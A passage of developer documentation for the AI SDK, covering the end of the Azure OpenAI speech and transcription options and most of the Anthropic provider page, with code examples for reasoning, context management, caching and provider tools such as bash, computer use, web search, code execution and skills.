    } satisfies OpenAITranscriptionModelOptions,
  },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
include string[] Additional information to include in the transcription response.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-1`
`gpt-4o-mini-transcribe`
`gpt-4o-transcribe`

Speech Models

You can create models that call the Azure OpenAI speech API using the .speech() factory method.

The first argument is your deployment name for the text-to-speech model (e.g., tts-1).

const model = azure.speech('your-tts-deployment-name');

Example

import { azure } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const result = await generateSpeech({
  model: azure.speech('your-tts-deployment-name'),
  text: 'Hello, world!',
  voice: 'alloy', // OpenAI voice ID
});

You can also pass additional provider-specific options using the providerOptions argument:

import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';

const result = await generateSpeech({
  model: azure.speech('your-tts-deployment-name'),
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      speed: 1.2,
    } satisfies OpenAISpeechModelOptions,
  },
});

The following provider options are available:

instructions string Control the voice of your generated audio with additional instructions e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
speed number The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.

Model Capabilities

Azure OpenAI supports TTS models through deployments. The capabilities depend on which model version your deployment is using:

Model Version	Instructions
`tts-1`
`tts-1-hd`
`gpt-4o-mini-tts`

title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.

Anthropic Provider

The Anthropic provider contains language model support for the Anthropic Messages API.

Setup

The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with

Provider Instance

You can import the default provider instance anthropic from @ai-sdk/anthropic:

import { anthropic } from '@ai-sdk/anthropic';

If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:

import { createAnthropic } from '@ai-sdk/anthropic';

const anthropic = createAnthropic({
  // custom settings
});

You can use the following optional settings to customize the Anthropic provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
apiKey string

API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable. Only one of apiKey or authToken is required.
authToken string

Auth token that is being sent using the Authorization: Bearer header. It defaults to the ANTHROPIC_AUTH_TOKEN environment variable. Only one of apiKey or authToken is required.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. claude-3-haiku-20240307. Some models have multi-modal capabilities.

const model = anthropic('claude-3-haiku-20240307');

You can also use the following aliases for model creation:

anthropic.languageModel('claude-3-haiku-20240307') - Creates a language model
anthropic.chat('claude-3-haiku-20240307') - Alias for languageModel
anthropic.messages('claude-3-haiku-20240307') - Alias for languageModel

You can use Anthropic language models to generate text with the generateText function:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-3-haiku-20240307'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Anthropic language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

The following optional provider options are available for Anthropic models:

disableParallelToolUse boolean

Optional. Disables the use of parallel tool calls. Defaults to false.

When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
sendReasoning boolean

Optional. Include reasoning content in requests sent to the model. Defaults to true.

If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
effort "low" | "medium" | "high" | "xhigh" | "max"

Optional. See Effort section for more details.
taskBudget object

Optional. See Task Budgets section for more details.
speed "fast" | "standard"

Optional. See Fast Mode section for more details.
inferenceGeo "us" | "global"

Optional. See Data Residency section for more details.
thinking object

Optional. See Reasoning section for more details.
toolStreaming boolean

Whether to enable tool streaming (and structured output streaming). Default to true.
structuredOutputMode "outputFormat" | "jsonTool" | "auto"

Determines how structured outputs are generated. Optional.
- "outputFormat": Use the output_format parameter to specify the structured output format.
- "jsonTool": Use a special "json" tool to specify the structured output format.
- "auto": Use "outputFormat" when supported, otherwise fall back to "jsonTool" (default).
metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.

Structured Outputs and Tool Input Streaming

Tool call streaming is enabled by default. You can opt out by setting the toolStreaming provider option to false.

import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: anthropic('claude-sonnet-4-20250514'),
  tools: {
    writeFile: tool({
      description: 'Write content to a file',
      inputSchema: z.object({
        path: z.string(),
        content: z.string(),
      }),
      execute: async ({ path, content }) => {
        // Implementation
        return { success: true };
      },
    }),
  },
  prompt: 'Write a short story to story.txt',
});

Effort

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, usage } = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      effort: 'low',
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(text); // resulting text
console.log(usage); // token usage

Fast Mode

Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Write a short poem about the sea.',
  providerOptions: {
    anthropic: {
      speed: 'fast',
    } satisfies AnthropicLanguageModelOptions,
  },
});

The speed option accepts 'fast' or 'standard' (default behavior).

Task Budgets

Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-7'),
  prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
  providerOptions: {
    anthropic: {
      taskBudget: {
        type: 'tokens',
        total: 400000,
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:

taskBudget: {
  type: 'tokens',
  total: 400000,
  remaining: 215000, // budget left after prior compacted-away contexts
}

The taskBudget object accepts:

type "tokens" - Budget type. Currently only "tokens" is supported.
total number - Total task budget for the agentic turn. Minimum 20,000.
remaining number - Budget left after prior compacted-away contexts. Must be between 0 and total. Defaults to total if omitted.

Data Residency

Anthropic supports an inferenceGeo option that controls where model inference runs for a request.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Summarize the key points of this document.',
  providerOptions: {
    anthropic: {
      inferenceGeo: 'us',
    } satisfies AnthropicLanguageModelOptions,
  },
});

The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).

Reasoning

Anthropic models support extended thinking, where Claude shows its reasoning process before providing a final answer.

Adaptive Thinking

For newer models (claude-sonnet-4-6, claude-opus-4-6, and later), use adaptive thinking. Claude automatically determines how much reasoning to use based on the complexity of the prompt.

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:

const { text } = await generateText({
  model: anthropic('claude-opus-4-6'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive' },
      effort: 'max', // 'low' | 'medium' | 'high' | 'max'
    } satisfies AnthropicLanguageModelOptions,
  },
});

Thinking Display (Opus 4.7+)

const { text, reasoningText } = await generateText({
  model: anthropic('claude-opus-4-7'),
  providerOptions: {
    anthropic: {
      thinking: { type: 'adaptive', display: 'summarized' },
    } satisfies AnthropicLanguageModelOptions,
  },
  prompt: 'How many people will live in the world in 2040?',
});

console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);

Budget-Based Thinking

For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929), use type: 'enabled' with an explicit token budget:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: anthropic('claude-sonnet-4-5-20250929'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicLanguageModelOptions,
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Context Management

Anthropic's Context Management feature allows you to automatically manage conversation context by clearing tool uses or thinking content when certain conditions are met. This helps optimize token usage and manage long conversations more efficiently.

You can configure context management using the contextManagement provider option:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5-20250929'),
  prompt: 'Continue our conversation...',
  providerOptions: {
    anthropic: {
      contextManagement: {
        edits: [
          {
            type: 'clear_tool_uses_20250919',
            trigger: { type: 'input_tokens', value: 10000 },
            keep: { type: 'tool_uses', value: 5 },
            clearAtLeast: { type: 'input_tokens', value: 1000 },
            clearToolInputs: true,
            excludeTools: ['important_tool'],
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

// Check what was cleared
console.log(result.providerMetadata?.anthropic?.contextManagement);

Context Editing

Context editing strategies selectively remove specific content types from earlier in the conversation to reduce token usage without losing the overall conversation flow.

Clear Tool Uses

The clear_tool_uses_20250919 edit type removes old tool call/result pairs from the conversation history:

trigger - Condition that triggers the clearing (e.g., { type: 'input_tokens', value: 10000 } or { type: 'tool_uses', value: 10 })
keep - How many recent tool uses to preserve (e.g., { type: 'tool_uses', value: 5 })
clearAtLeast - Minimum amount to clear (e.g., { type: 'input_tokens', value: 1000 })
clearToolInputs - Whether to clear tool input parameters (boolean)
excludeTools - Array of tool names to never clear

Clear Thinking

The clear_thinking_20251015 edit type removes thinking/reasoning blocks from earlier turns, keeping only the most recent ones:

keep - How many recent thinking turns to preserve (e.g., { type: 'thinking_turns', value: 2 }) or 'all' to keep everything

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Continue reasoning...',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
      contextManagement: {
        edits: [
          {
            type: 'clear_thinking_20251015',
            keep: { type: 'thinking_turns', value: 2 },
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Compaction

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';

const result = streamText({
  model: anthropic('claude-opus-4-6'),
  messages: conversationHistory,
  providerOptions: {
    anthropic: {
      contextManagement: {
        edits: [
          {
            type: 'compact_20260112',
            trigger: {
              type: 'input_tokens',
              value: 50000, // trigger compaction when input exceeds 50k tokens
            },
            instructions:
              'Summarize the conversation concisely, preserving key decisions and context.',
            pauseAfterCompaction: false,
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Configuration:

trigger - Condition that triggers compaction (e.g., { type: 'input_tokens', value: 50000 })
instructions - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
pauseAfterCompaction - When true, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to false.

When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.

Detecting Compaction in Streams

When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-start': {
      const isCompaction =
        part.providerMetadata?.anthropic?.type === 'compaction';
      if (isCompaction) {
        console.log('[COMPACTION SUMMARY START]');
      }
      break;
    }
    case 'text-delta': {
      process.stdout.write(part.text);
      break;
    }
  }
}

Compaction in UI Applications

When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:

{
  message.parts.map((part, index) => {
    if (part.type === 'text') {
      const isCompaction =
        (part.providerMetadata?.anthropic as { type?: string } | undefined)
          ?.type === 'compaction';

      if (isCompaction) {
        return (
          <div
            key={index}
            className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
          >
            <span className="font-bold">[Compaction Summary]</span>
            <div>{part.text}</div>
          </div>
        );
      }
      return <div key={index}>{part.text}</div>;
    }
  });
}

Applied Edits Metadata

After generation, you can check which edits were applied in the provider metadata:

const metadata = result.providerMetadata?.anthropic?.contextManagement;

if (metadata?.appliedEdits) {
  metadata.appliedEdits.forEach(edit => {
    if (edit.type === 'clear_tool_uses_20250919') {
      console.log(`Cleared ${edit.clearedToolUses} tool uses`);
      console.log(`Freed ${edit.clearedInputTokens} tokens`);
    } else if (edit.type === 'clear_thinking_20251015') {
      console.log(`Cleared ${edit.clearedThinkingTurns} thinking turns`);
      console.log(`Freed ${edit.clearedInputTokens} tokens`);
    } else if (edit.type === 'compact_20260112') {
      console.log('Compaction was applied');
    }
  });
}

For more details, see Anthropic's Context Management documentation.

Cache Control

The cache creation input tokens are then returned in the providerMetadata object for generateText, again under the anthropic property. When you use streamText, the response contains a promise that resolves to the metadata. Alternatively you can receive it in the onFinish callback.

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const errorMessage = '... long error message ...';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'You are a JavaScript expert.' },
        {
          type: 'text',
          text: `Error message: ${errorMessage}`,
          providerOptions: {
            anthropic: { cacheControl: { type: 'ephemeral' } },
          },
        },
        { type: 'text', text: 'Explain the error message.' },
      ],
    },
  ],
});

console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118 }

You can also use cache control on system messages by providing multiple system messages at the head of your messages array:

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'system',
      content: 'Cached system message part',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'system',
      content: 'Uncached system message part',
    },
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Cache control for tools:

const result = await generateText({
  model: anthropic('claude-haiku-4-5'),
  tools: {
    cityAttractions: tool({
      inputSchema: z.object({ city: z.string() }),
      providerOptions: {
        anthropic: {
          cacheControl: { type: 'ephemeral' },
        },
      },
    }),
  },
  messages: [
    {
      role: 'user',
      content: 'User prompt',
    },
  ],
});

Longer cache TTL

Anthropic also supports a longer 1-hour cache duration.

Here's an example:

const result = await generateText({
  model: anthropic('claude-haiku-4-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Long cached message',
          providerOptions: {
            anthropic: {
              cacheControl: { type: 'ephemeral', ttl: '1h' },
            },
          },
        },
      ],
    },
  ],
});

Limitations

The minimum cacheable prompt length is:

4096 tokens for Claude Opus 4.5
1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, Claude Sonnet 3.7, and Claude Opus 3
4096 tokens for Claude Haiku 4.5
2048 tokens for Claude Haiku 3.5 and Claude Haiku 3

Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.

For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.

Bash Tool

The Bash Tool allows running bash commands. Here's how to create and use it:

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => {
    // Implement your bash command execution logic here
    // Return the result of the command execution
  },
});

Parameters:

command (string): The bash command to run. Required unless the tool is being restarted.
restart (boolean, optional): Specifying true will restart this tool.

Memory Tool

The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:

const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    // Implement your memory command execution logic here
    // Return the result of the command execution
  },
});

Only certain Claude versions are supported.

Text Editor Tool

The Text Editor Tool provides functionality for viewing and editing text files.

const tools = {
  str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
    maxCharacters: 10000, // optional
    async execute({ command, path, old_str, new_str, insert_text }) {
      // ...
    },
  }),
} satisfies ToolSet;

textEditor_20250728 - For Claude Sonnet 4, Opus 4, and Opus 4.1 (recommended)
textEditor_20250124 - For Claude Sonnet 3.7
textEditor_20241022 - For Claude Sonnet 3.5

Note: textEditor_20250429 is deprecated. Use textEditor_20250728 instead.

Parameters:

command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
file_text (string, optional): Required for create command, with the content of the file to be created.
insert_line (number, optional): Required for insert command. The line number after which to insert the new string.
new_str (string, optional): New string for str_replace command.
insert_text (string, optional): Required for insert command, containing the text to insert.
old_str (string, optional): Required for str_replace command, containing the string to replace.
view_range (number[], optional): Optional for view command to specify line range to show.

Computer Tool

The Computer Tool enables control of keyboard and mouse actions on a computer:

const computerTool = anthropic.tools.computer_20251124({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  displayNumber: 0, // Optional, for X11 environments
  enableZoom: true, // Optional, enables the zoom action

  execute: async ({ action, coordinate, text, region }) => {
    // Implement your computer control logic here
    // Return the result of the action

    // Example code:
    switch (action) {
      case 'screenshot': {
        // multipart result:
        return {
          type: 'image',
          data: fs
            .readFileSync('./data/screenshot-editor.png')
            .toString('base64'),
        };
      }
      case 'zoom': {
        // region is [x1, y1, x2, y2] defining the area to zoom into
        return {
          type: 'image',
          data: fs.readFileSync('./data/zoomed-region.png').toString('base64'),
        };
      }
      default: {
        console.log('Action:', action);
        console.log('Coordinate:', coordinate);
        console.log('Text:', text);
        return `executed ${action}`;
      }
    }
  },

  // map to tool result content for LLM consumption:
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Parameters:

action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position' | 'zoom'): The action to perform. The zoom action is only available with computer_20251124.
coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
text (string, optional): Required for type and key actions.
region (number[], optional): Required for zoom action. Specifies [x1, y1, x2, y2] coordinates for the area to inspect.
displayWidthPx (number): The width of the display in pixels.
displayHeightPx (number): The height of the display in pixels.
displayNumber (number, optional): The display number for X11 environments.
enableZoom (boolean, optional): Enable the zoom action. Only available with computer_20251124. Default: false.

Web Search Tool

You can enable web search using the provider-defined web search tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 5,
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: webSearchTool,
  },
});

Configuration Options

The web search tool supports several configuration options:

maxUses number

Maximum number of web searches Claude can perform during the conversation.
allowedDomains string[]

Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
blockedDomains string[]

Optional list of domains that Claude should avoid when searching.
userLocation object

Optional user location information to provide geographically relevant search results.

const webSearchTool = anthropic.tools.webSearch_20250305({
  maxUses: 3,
  allowedDomains: ['techcrunch.com', 'wired.com'],
  blockedDomains: ['example-spam-site.com'],
  userLocation: {
    type: 'approximate',
    country: 'US',
    region: 'California',
    city: 'San Francisco',
    timezone: 'America/Los_Angeles',
  },
});

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Find local news about technology',
  tools: {
    web_search: webSearchTool,
  },
});

Web Fetch Tool

You can enable web fetch using the provider-defined web fetch tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-0'),
  prompt:
    'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
  tools: {
    web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
  },
});

Tool Search

Anthropic provides provider-defined tool search tools that enable Claude to work with hundreds or thousands of tools by dynamically discovering and loading them on-demand. Instead of loading all tool definitions into the context window upfront, Claude searches your tool catalog and loads only the tools it needs.

There are two variants:

BM25 Search - Uses natural language queries to find tools
Regex Search - Uses regex patterns (Python re.search() syntax) to find tools

Basic Usage

import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    toolSearch: anthropic.tools.toolSearchBm25_20251119(),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({
        location: z.string().describe('The city and state'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72,
        condition: 'Sunny',
      }),
      // Defer tool here - Claude discovers these via the tool search tool
      providerOptions: {
        anthropic: { deferLoading: true },
      },
    }),
  },
});

Using Regex Search

For more precise tool matching, you can use the regex variant:

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'Get the weather data',
  tools: {
    toolSearch: anthropic.tools.toolSearchRegex_20251119(),
    // ... deferred tools
  },
});

Claude will construct regex patterns like weather|temperature|forecast to find matching tools.

Custom Tool Search

You can implement your own tool search logic (e.g., using embeddings or semantic search) by returning tool-reference content blocks via toModelOutput:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'What is the weather in San Francisco?',
  tools: {
    // Custom search tool
    searchTools: tool({
      description: 'Search for tools by keyword',
      inputSchema: z.object({ query: z.string() }),
      execute: async ({ query }) => {
        // Your custom search logic (embeddings, fuzzy match, etc.)
        const allTools = ['get_weather', 'get_forecast', 'get_temperature'];
        return allTools.filter(name => name.includes(query.toLowerCase()));
      },
      toModelOutput: ({ output }) => ({
        type: 'content',
        value: (output as string[]).map(toolName => ({
          type: 'custom' as const,
          providerOptions: {
            anthropic: {
              type: 'tool-reference',
              toolName,
            },
          },
        })),
      }),
    }),

    // Deferred tools
    get_weather: tool({
      description: 'Get the current weather',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => ({ location, temperature: 72 }),
      providerOptions: {
        anthropic: { deferLoading: true },
      },
    }),
  },
});

This sends tool_reference blocks to Anthropic, which loads the corresponding deferred tool schemas into Claude's context.

MCP Connectors

Anthropic supports connecting to MCP servers as part of their execution.

You can enable this feature with the mcpServers provider option:

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: `Call the echo tool with "hello world". what does it respond with back?`,
  providerOptions: {
    anthropic: {
      mcpServers: [
        {
          type: 'url',
          name: 'echo',
          url: 'https://echo.mcp.inevitable.fyi/mcp',
          // optional: authorization token
          authorizationToken: mcpAuthToken,
          // optional: tool configuration
          toolConfiguration: {
            enabled: true,
            allowedTools: ['echo'],
          },
        },
      ],
    } satisfies AnthropicLanguageModelOptions,
  },
});

The tool calls and results are dynamic, i.e. the input and output schemas are not known.

Configuration Options

The web fetch tool supports several configuration options:

maxUses number

The maxUses parameter limits the number of web fetches performed.
allowedDomains string[]

Only fetch from these domains.
blockedDomains string[]

Never fetch from these domains.
citations object

Unlike web search where citations are always enabled, citations are optional for web fetch. Set "citations": {"enabled": true} to enable Claude to cite specific passages from fetched documents.
maxContentTokens number

The maxContentTokens parameter limits the amount of content that will be included in the context.

Error Handling

Web search errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText): Web search errors throw exceptions that you can catch:

try {
  const result = await generateText({
    model: anthropic('claude-opus-4-20250514'),
    prompt: 'Search for something',
    tools: {
      web_search: webSearchTool,
    },
  });
} catch (error) {
  if (error.message.includes('Web search failed')) {
    console.log('Search error:', error.message);
    // Handle search error appropriately
  }
}

Streaming (streamText): Web search errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Search for something',
  tools: {
    web_search: webSearchTool,
  },
});

for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Search error:', part.error);
    // Handle search error appropriately
  }
}

Code Execution

Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment allowing it to execute code to inform its responses.

You can enable code execution using the provider-defined code execution tool:

import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const codeExecutionTool = anthropic.tools.codeExecution_20260120();

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt:
    'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
  tools: {
    code_execution: codeExecutionTool,
  },
});

Error Handling

Code execution errors are handled differently depending on whether you're using streaming or non-streaming:

Non-streaming (generateText): Code execution errors are delivered as tool result parts in the response:

const result = await generateText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});

const toolErrors = result.content?.filter(
  content => content.type === 'tool-error',
);

toolErrors?.forEach(error => {
  console.error('Tool execution error:', {
    toolName: error.toolName,
    toolCallId: error.toolCallId,
    error: error.error,
  });
});

Streaming (streamText): Code execution errors are delivered as error parts in the stream:

const result = await streamText({
  model: anthropic('claude-opus-4-20250514'),
  prompt: 'Execute some Python script',
  tools: {
    code_execution: codeExecutionTool,
  },
});
for await (const part of result.textStream) {
  if (part.type === 'error') {
    console.log('Code execution error:', part.error);
    // Handle code execution error appropriately
  }
}

Programmatic Tool Calling

Programmatic Tool Calling allows Claude to write code that calls your tools programmatically within a code execution container, rather than requiring round trips through the model for each tool invocation. This reduces latency for multi-tool workflows and decreases token consumption.

To enable programmatic tool calling, use the allowedCallers provider option on tools that you want to be callable from within code execution:

import {
  anthropic,
  forwardAnthropicContainerIdFromLastStep,
} from '@ai-sdk/anthropic';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  stopWhen: stepCountIs(10),
  prompt:
    'Get the weather for Tokyo, Sydney, and London, then calculate the average temperature.',
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),

    getWeather: tool({
      description: 'Get current weather data for a city.',
      inputSchema: z.object({
        city: z.string().describe('Name of the city'),
      }),
      execute: async ({ city }) => {
        // Your weather API implementation
        return { temp: 22, condition: 'Sunny' };
      },
      // Enable this tool to be called from within code execution
      providerOptions: {
        anthropic: {
          allowedCallers: ['code_execution_20260120'],
        },
      },
    }),
  },

  // Propagate container ID between steps for code execution continuity
  prepareStep: forwardAnthropicContainerIdFromLastStep,
});

In this flow:

Claude writes Python code that calls your getWeather tool multiple times in parallel
The SDK automatically executes your tool and returns results to the code execution container
Claude processes the results in code and generates the final response

Container Persistence

When using programmatic tool calling across multiple steps, you need to preserve the container ID between steps using prepareStep. You can use the forwardAnthropicContainerIdFromLastStep helper function to do this automatically. The container ID is available in providerMetadata.anthropic.container.id after each step completes.

Agent Skills

Using Built-in Skills

Anthropic provides several built-in skills:

pptx - Create and edit PowerPoint presentations
docx - Create and edit Word documents
pdf - Process and analyze PDF files
xlsx - Work with Excel spreadsheets

To use skills, you need to:

Enable the code execution tool
Specify the container with skills in providerOptions

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Create a presentation about renewable energy with 5 slides',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'anthropic',
            skillId: 'pptx',
            version: 'latest', // optional
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

Custom Skills

You can also use custom skills by specifying type: 'custom':

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
  },
  prompt: 'Use my custom skill to process this data',
  providerOptions: {
    anthropic: {
      container: {
        skills: [
          {
            type: 'custom',
            skillId: 'my-custom-skill-id',
            version: '1.0', // optional
          },
        ],
      },
    } satisfies AnthropicLanguageModelOptions,
  },
});

PDF support

Anthropic Claude models support reading PDF files. You can pass PDF files as part of the message content using the file type:

Option 1: URL-based PDF document

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  messages: [
    {
      role: 'user',
